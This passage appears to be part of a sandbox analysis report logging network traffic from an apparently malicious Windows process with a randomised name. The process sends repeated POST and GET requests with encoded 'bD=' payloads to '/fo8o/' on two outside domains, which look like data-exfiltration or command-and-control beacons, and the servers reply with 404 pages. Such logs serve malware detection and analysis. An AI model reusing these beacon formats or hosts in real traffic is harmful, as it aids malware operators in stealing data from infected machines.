Apr 19, 2024 03:30:07.524143934 CEST	637	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:07 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49745	66.29.149.46	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:10.042437077 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d Data Ascii: bD=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
Apr 19, 2024 03:30:10.211322069 CEST	637	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:10 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49746	66.29.149.46	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:12.726802111 CEST	1821	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 37 63 67 57 37 7a 75 49 36 30 4a 65 53 69 37 58 37 61 6e 30 70 48 31 35 6e 45 46 4e 5a 41 53 67 4f 56 52 77 4b 46 6b 72 4e 61 45 31 77 79 5a 50 50 56 63 6f 45 54 71 45 48 46 6b 69 77 51 79 6f 46 78 79 77 76 71 43 30 78 39 38 43 37 76 70 68 7a 76 4d 6c 34 55 67 45 43 72 39 65 67 6f 46 55 39 33 31 4d 72 79 77 6c 52 53 41 76 52 6b 6c 30 65 38 50 31 31 6c 52 4c 6a 37 47 56 37 36 4c 70 51 46 30 50 69 62 75 70 2f 35 45 79 43 4e 66 63 71 79 33 4b 79 4e 76 4e 51 6c 72 44 79 53 73 75 48 53 54 6e 7a 6e 33 35 2f 2f 35 45 48 67 31 49 64 39 2b 78 7a 62 33 4e 38 34 63 63 52 50 63 69 31 73 72 31 31 53 7a 31 70 78 6f 74 30 53 31 70 7a 76 49 48 50 52 4f 6d 47 70 65 2f 38 45 30 41 61 4a 44 53 77 6d 56 7a 52 65 66 2f 54 39 68 6a 61 70 47 41 36 71 47 45 45 44 70 65 4b 4e 45 35 65 7a 32 36 4a 51 46 68 50 68 35 69 39 65 2b 66 54 33 79 4d 39 4f 38 6d 71 6d 31 32 56 4d 45 6c 7a 66 2b 41 66 7a 55 45 35 33 30 6a 75 46 49 6c 78 36 2b 64 45 43 4f 4b 79 4e 6c 42 32 50 70 69 50 75 4f 51 69 36 69 51 58 43 67 6a 78 73 43 4d 75 51 79 58 79 56 6b 72 33 33 62 65 33 2b 56 38 79 4c 77 50 6a 77 73 5a 32 38 39 4e 72 2f 46 6d 57 45 34 2b 7a 4c 2f 59 67 48 39 62 4a 74 47 46 59 30 75 30 73 64 79 6a 57 78 65 4e 58 38 6a 38 6d 76 41 56 4a 39 37 69 4a 52 55 74 68 4d 71 33 69 74 68 6f 71 6f 57 53 6d 56 70 67 6f 39 4c 46 41 69 58 56 2b 33 41 54 46 66 54 55 70 33 4d 2f 4f 52 64 49 4c 39 57 35 48 4d 45 4d 59 52 51 64 72 42 43 34 78 6d 37 54 4f 61 6d 68 53 70 6f 4a 45 4f 54 71 30 76 77 4c 47 62 36 63 61 2f 6e 38 4a 58 63 75 4f 30 49 47 35 51 36 4d 34 75 34 61 61 34 36 42 44 31 36 51 79 47 50 48 76 69 42 51 66 4e 59 53 6e 46 6c 70 71 49 34 35 69 33 50 48 43 66 64 53 75 51 64 67 38 39 48 57 76 62 54 79 49 43 67 67 2f 5a 78 36 69 35 4e 6a 6b 74 6e 54 37 76 66 77 49 4a 34 65 56 74 46 62 52 36 75 59 7a 4d 32 59 74 76 72 37 34 59 53 4c 6d 73 31 70 66 65 50 55 76 6f 4c 78 6f 30 70 46 46 4b 74 63 5a 58 43 42 42 43 4b 51 48 71 62 56 4f 45 6a 42 65 76 6a 6f 41 38 53 53 4f 58 44 34 76 2f 52 67 58 78 6a 46 47 34 4a 4e 31 49 57 34 45 4a 2b 54 57 62 78 55 53 51 57 44 61 49 65 72 7a 4d 4c 32 62 53 49 38 75 6d 65 56 67 64 65 2b 34 46 64 79 4d 7a 65 39 76 67 72 5a 63 7a 79 4c 4d 2b 49 56 53 35 55 44 7a 38 49 6c 41 33 68 58 75 61 41 4b 45 45 4b 5a 77 74 75 47 52 46 55 41 44 75 79 62 77 33 73 70 74 49 41 45 61 45 77 63 77 58 49 6b 73 57 34 30 56 6c 54 58 6e 49 2f 42 34 5a 30 72 73 36 78 43 52 4c 36 59 58 34 39 70 53 37 30 57 6e 51 52 65 4e 7a 4a 73 5a 58 47 56 6c 50 32 69 39 76 36 49 41 31 55 50 6b 6b 34 66 55 45 72 65 35 51 73 35 4c 38 6a 66 76 30 55 37 77 62 48 43 31 51 50 44 68 6a 6a 6c 64 6e 5a 6e 53 31 74 71 64 42 2f 58 5a 68 69 70 53 44 68 4f 32 63 48 45 39 68 57 75 57 56 43 64 57 5a 66 59 65 39 35 42 43 55 49 2b 78 45 4d 73 32 63 48 51 77 59 3d Data Ascii: bD=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8Fx0Z1y1My6hM/tNPbBkWKg6k0W9ChS9XR+73/qVYxIy0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vLGA704DUih8I3gtok2B4k2+tMnwYsu+cPqHFgW7UJLcFPs2JResH/AodcegaCN7hhouC5ZpJEsHEiX7cgW7zuI60JeSi7X7an0pH15nEFNZASgOVRwKFkrNaE1wyZPPVcoETqEHFkiwQyoFxywvqC0x98C7vphzvMl4UgECr9egoFU931MrywlRSAvRkl0e8P11lRLj7GV76LpQF0Pibup/5EyCNfcqy3KyNvNQlrDySsuHSTnzn35//5EHg1Id9+xzb3N84ccRPci1sr11Sz1pxot0S1pzvIHPROmGpe/8E0AaJDSwmVzRef/T9hjapGA6qGEEDpeKNE5ez26JQFhPh5i9e+fT3yM9O8mqm12VMElzf+AfzUE530juFIlx6+dECOKyNlB2PpiPuOQi6iQXCgjxsCMuQyXyVkr33be3+V8yLwPjwsZ289Nr/FmWE4+zL/YgH9bJtGFY0u0sdyjWxeNX8j8mvAVJ97iJRUthMq3ithoqoWSmVpgo9LFAiXV+3ATFfTUp3M/ORdIL9W5HMEMYRQdrBC4xm7TOamhSpoJEOTq0vwLGb6ca/n8JXcuO0IG5Q6M4u4aa46BD16QyGPHviBQfNYSnFlpqI45i3PHCfdSuQdg89HWvbTyICgg/Zx6i5NjktnT7vfwIJ4eVtFbR6uYzM2Ytvr74YSLms1pfePUvoLxo0pFFKtcZXCBBCKQHqbVOEjBevjoA8SSOXD4v/RgXxjFG4JN1IW4EJ+TWbxUSQWDaIerzML2bSI8umeVgde+4FdyMze9vgrZczyLM+IVS5UDz8IlA3hXuaAKEEKZwtuGRFUADuybw3sptIAEaEwcwXIksW40VlTXnI/B4Z0rs6xCRL6YX49pS70WnQReNzJsZXGVlP2i9v6IA1UPkk4fUEre5Qs5L8jfv0U7wbHC1QPDhjjldnZnS1tqdB/XZhipSDhO2cHE9hWuWVCdWZfYe95BCUI+xEMs2cHQwY=
Apr 19, 2024 03:30:12.894342899 CEST	637	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:12 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49747	66.29.149.46	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:15.415205002 CEST	515	OUT	GET /fo8o/?bD=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&VVq=lF_H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:30:15.584261894 CEST	652	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:15 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49749	195.110.124.133	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:21.242778063 CEST	802	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f Data Ascii: bD=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
Apr 19, 2024 03:30:21.465096951 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:21 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49750	195.110.124.133	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:23.995161057 CEST	826	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 